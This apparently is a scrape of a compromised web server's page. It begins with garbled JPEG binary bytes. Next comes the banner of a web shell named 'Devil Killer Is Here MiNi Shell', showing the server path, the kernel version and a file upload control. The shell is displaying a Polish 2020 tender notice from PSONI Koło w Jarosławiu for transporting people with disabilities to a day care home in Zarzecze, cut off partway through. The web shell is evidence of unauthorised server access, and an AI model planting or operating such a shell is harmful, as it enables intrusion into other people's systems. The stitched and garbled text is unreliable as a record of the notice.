JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20201008/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20201008/594836-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 594836-N-2020 z dnia 2020-10-08 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Polskie Stowarzyszenie na rzecz Osób z Niepełnosprawnością Intelektualną Koło w Jarosławiu</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dowóz uczestników projektu do Dziennego Domu Pomocy w Zarzeczu</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Projekt pn. "Dzienny Dom Pomocy PSONI Koło w Jarosławiu" współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014-2020, Oś priorytetowa VIII Integracja społeczna, Działanie 8.3 - Zwiększenie dostępu do usług społecznych i zdrowotnych oraz Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych w ramach programu „Partnerstwo dla osób z niepełnosprawnościami”.</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Polskie Stowarzyszenie na rzecz Osób z Niepełnosprawnością Intelektualną Koło w Jarosławiu</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">65088677600000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Wilsona</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">6 a</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">37-500</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Jarosław</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">podkarpackie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">166 215 378</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">biuro@psoni-jaroslaw.org.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">166 215 378</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.psoni-jaroslaw.org.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">stowarzyszenie</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.psoni-jaroslaw.org.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty należy składać w formie pisemnej pod rygorem nieważności</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Polskie Stowarzyszenie na rzecz Osób z Niepełnosprawnością Intelektualną Koło w Jarosławiu, ul. Wilsona 6a, 37-500 Jarosław</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dowóz uczestników projektu do Dziennego Domu Pomocy w Zarzeczu</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">PSONI/DP/2130-6/2536/20</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.	Przedmiotem zamówienia jest świadczenie usługi transportowej w zakresie przewozu 11 osób, w tym: 9 uczestników projektu (osoby z niepełnosprawnościami), zamieszkałych na terenie powiatu jarosławskiego oraz przeworskiego oraz 2 opiekunów.2.	Transport realizowany będzie w dni robocze, od poniedziałku do piątku z wyłączeniem świąt i dni ustawowo wolnych od pracy i obejmował będzie:Część I zamówienia:Trasa nr 1.Dowiezienie uczestników projektu do Dziennego Domu Pomocy (DDP) w Zarzeczu ul. Ks. Gajeckiego 2, 37-205 Zarzecze, na godzinę 8:00 z ich miejsca zamieszkania, tj. Boratyn (1 osoba), Radymno (1 osoba), Nienowice (1 osoba), Ryszkowa Wola (1 osoba), a następnie odwiezienie uczestników projektu z DDP w Zarzeczu do miejsca zamieszkania – wyjazd o godz. 14:00.Kurs każdorazowo będzie się rozpoczynał i kończył przy ul. Ks. Gajeckiego 2, 37-205 Zarzecze w celu zapewnienia udziału opiekuna w dowozie. Łącznie usługa świadczona będzie dla 5 osób (4 uczestników projektu oraz opiekun). Przewidywana dzienna długość trasy – 204 km.Planowana liczba dni dowozu – 523.Czas trwania przywozu i odwozu nie powinien przekroczyć odpowiednio 120 min.Pojazd powinien być przystosowany do przewożenia osób z niepełnosprawnościami, posiadać 1 miejsce do przewożenia osoby na wózku inwalidzkim. Zamawiający dopuszcza w sytuacjach wyjątkowych, niezależnych od przewoźnika, odstępstwa od przyjętego czasu dowozu w przypadku niekorzystnych warunków atmosferycznych, czasowej zmiany organizacji ruchu lub uzasadnionych sytuacji losowych. Wykonawca w porozumieniu z Zamawiającym ustali optymalną trasę przejazdu, mając na uwadze jak najkrótszy czas przebywania uczestnika w podróży.Część II zamówienia:Trasa nr 2Dowiezienie uczestników projektu do Dziennego Domu Pomocy w Zarzeczu ul. Ks. Gajeckiego 2, 37-205 Zarzecze na godzinę 7:00 z ich miejsca zamieszkania, tj. Przeworska (2 osoby), a następnie odwiezienie uczestników projektu do miejsca zamieszkania od godz. 14:00 (Kurs 1). Po przywiezieniu uczestników z Przeworska do Zarzecza, rozpoczęcie kolejnego kursu i przywiezienie kolejnych uczestników na godzinę 8.00 z ich miejsca zamieszkania tj. Kruchel Pełkiński (1 osoba), Jarosław (2 osoby), a następnie odwiezienie uczestników projektu z DDP w Zarzeczu do miejsca zamieszkania od godz. 15:00 (Kurs 2).Kurs każdorazowo będzie się rozpoczynał i kończył przy przy ul. Ks. Gajeckiego 2, 37-205 Zarzecze w celu zapewnienia udziału opiekuna w dowozie. Łącznie usługa świadczona będzie dla 6 osób w tym:•	3 osób (2 uczestników projektu oraz opiekun) – Kurs 1•	4 osób (3 uczestników projektu oraz opiekun) – Kurs 2Przewidywana dzienna długość trasy – 110 km.Planowana liczba dni dowozu – 523.Czas trwania przywozu i odwozu nie powinien przekroczyć odpowiednio 40 min. (Kurs 1) i 60 min. (Kurs 2).Pojazd powinien być przystosowany do przewożenia osób z niepełnosprawnościami, posiadać 2 miejsce do przewożenia osoby na wózku inwalidzkim. Zamawiający dopuszcza w sytuacjach wyjątkowych, niezależnych od przewoźnika odstępstwa od przyjętego czasu dowozu w przypadku niekorzystnych warunków atmosferycznych, czasowej zmiany organizacji ruchu lub uzasadnionych sytuacji losowych. Wykonawca w porozumieniu z Zamawiającym ustali optymalną trasę przejazdu, mając na uwadze jak najkrótszy czas przebywania uczestnika w podróży.3.	W wyjątkowych sytuacjach dowóz może być realizowany w sobotę, w zamian za inny dzień roboczy.4.	Zamawiający zastrzega możliwość zmiany tras (+/- 20% łącznej długości tras dla każdej z części) oraz zwiększenia liczby dowożonych osób ( o 1 osobę w każdej z części zamówienia), co nie może stanowić podstawy do wnoszenia roszczeń przez Wykonawcę. Zmiana będzie każdorazowo uzgadniana z Wykonawcą.5.	Dowóz będzie odbywał się z udziałem odpowiednio przeszkolonego opiekuna. Opiekuna zapewni Zamawiający. 6.	Wykonawca jest zobowiązany do zapewnienia utrzymania pojazdów dowożących w należytym stanie technicznym, gwarantując sprawność pojazdów i bezpieczeństwo przewożonych osób. Usunięcie usterek oraz wszelkie doposażenie pojazdów Wykonawca zapewnia we własnym zakresie.7.	Od Wykonawcy wymaga się dostosowania liczby pojazdów do liczby osób uprawnionych do dowozu, z uwzględnieniem określonych wyżej zasad dotyczących wykonywania usługi dowozu.8.	Pojazdy muszą być utrzymane w czystości, z zachowaniem estetyki wewnętrznej i zewnętrznej, w okresie zimowym wyposażone w opony zimowe, muszą posiadać sprawne ogrzewanie i klimatyzację oraz pasy bezpieczeństwa dla wszystkich przewożonych osób. 9.	Pojazdy dowożące uczestników muszą być przystosowane do przewozu osób z niepełnosprawnościami, w tym osób poruszających się na wózku inwalidzkim (w części I zamówienia -1 osoba, w części II zamówienia - 2 osoby), tj. wyposażone w windę hydrauliczną lub podjazd dla wózków inwalidzkich oraz specjalne, atestowane mocowania na wózki inwalidzkie, posiadać pasy stabilizujące pozycję osoby niepełnosprawnej, zgodnie z przepisami obowiązującymi w tym zakresie. Pojazdy powinny być oznakowane stosownie do charakteru świadczonych usług tj. transportu osób niepełnosprawnych.10. Koszt przystosowania pojazdu/pojazdów do przewozu osób na wózkach inwalidzkich ponosi Wykonawca.11.	Wszystkie dowożone osoby muszą mieć zapewnione miejsca siedzące, Zamawiający nie dopuszcza miejsc stojących w pojazdach.12.	Wykonawca gwarantuje bezpieczeństwo osób i mienia podczas wykonywania usługi przewozu osób. Zamawiający nie bierze żadnej odpowiedzialności za wypadki i zdarzenia jakiegokolwiek typu, w wyniku których nastąpi uszkodzenie ciała, śmierć czy szkoda materialna spowodowana działalnością Wykonawcy. 13.	Wykonawca zobowiązuje się świadczyć usługi przewozowe przy zachowaniu przepisów Prawo o ruchu drogowym oraz przepisów dotyczących czasu pracy kierowców, a także zgodnie z ustaloną przez Zamawiającego procedurą dowozu do placówek PSONI Koło w Jarosławiu w związku ze stanem epidemii COVID -19.14.	Wykonawca musi posiadać uprawnienia niezbędne do realizowania co najmniej przewozów krajowych zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym oraz aktualne i ważne ubezpieczenie pojazdu (polisa OC, NNW). 15.	W przypadku czasowej niemożności świadczenia usług przewozowych, w uzasadnionych przypadkach, Wykonawca zobowiązuje się do niezwłocznego powiadomienia Zamawiającego i zorganizowania zastępczego wykonania usługi, jak najszybciej, jednak nie dłużej niż w ciągu 1,5 godziny, zapewniającego ciągłość dowozu oraz równorzędny poziom usług.16.	W przypadku zmiany trasy spowodowanej np. chorobą uczestnika, Wykonawca zostanie powiadomiony przez kierownika DDP najpóźniej rano w dniu dowozu, przed rozpoczęciem świadczenia usługi.17.	Zamawiający zastrzega możliwość czasowego zawieszenia świadczenia usługi lub jej części, jeżeli z przyczyn niezależnych od Zamawiającego (np. wpływ stanu zagrożenia epidemicznego lub epidemii), będzie on zmuszony do zawieszenia działalności placówki lub jej zamknięcia, co nie może stanowić podstawy do wnoszenia roszczeń przez Wykonawcę.18.	Wykonawca będzie dokonywał comiesięcznych rozliczeń z wykonanej usługi na podstawie faktur. Podstawę wystawienia faktury VAT, stanowić będzie wykaz przejechanych kilometrów, każdorazowo poświadczony po zakończeniu trasy dowozu przez opiekuna uczestniczącego w transporcie i przez kierowcę oraz zatwierdzony przez Zamawiającego. Należność na wystawionej fakturze VAT, stanowić będzie iloczyn przejechanych kilometrów oraz koszt jednostkowy za przejechanie 1 km wskazany w ofercie Wykonawcy. Płatność 21 dni od momentu dostarczenia faktury VAT Zamawiającemu. Wykonawca w cenie ofertowej, musi uwzględnić wszelkie koszty niezbędne do prawidłowego wykonania przedmiotu zamówienia.19.	Zamawiający stosownie do art. 29 ust. 3a ustawy Pzp wymaga zatrudnienia przez Wykonawcę, Podwykonawcę kierowców pojazdów na podstawie umowy o pracę (nie dotyczy osób fizycznych prowadzących działalność gospodarczą niezatrudniających pracowników lub niezawierających umów cywilnoprawnych, które będą samodzielnie realizować zamówienie publicznie).</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">60130000-8</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2022-11-30</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2022-11-30</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span 